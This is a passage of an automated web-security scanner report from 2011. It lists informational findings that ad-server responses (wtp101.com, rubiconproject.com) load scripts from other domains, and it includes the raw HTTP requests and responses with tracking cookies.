Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:12:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600778; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600778,ova!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5Mj
...[SNIP]...
NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1089883246?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1089883246?">
</SCRIPT>
...[SNIP]...

20.27. http://o-va3.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; s=!1762!3105!2445!1731; synclock=t

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:03:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600201,ova3!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3ND
...[SNIP]...
NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1654066132?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1654066132?">
</SCRIPT>
...[SNIP]...

20.28. http://o-va3.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imp?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscvhQXm1RSwi_skszjsFtTxBnAoxa_C0A HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M#,1317600740; pvmap=!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:30:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M#,1317601852; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317601852,ova3!3919,1317601775,ova3!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkOTI0Nm
...[SNIP]...
NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1505999587?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1505999587?">
</SCRIPT>
...[SNIP]...

20.29. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=300x250;ord=$random$?" type="text/javascript"></script>
...[SNIP]...

20.30. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^3; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3188003.js^3^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=728x90;ord=$random$?" type="text/javascript"></script>
...[SNIP]...

20.31. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; 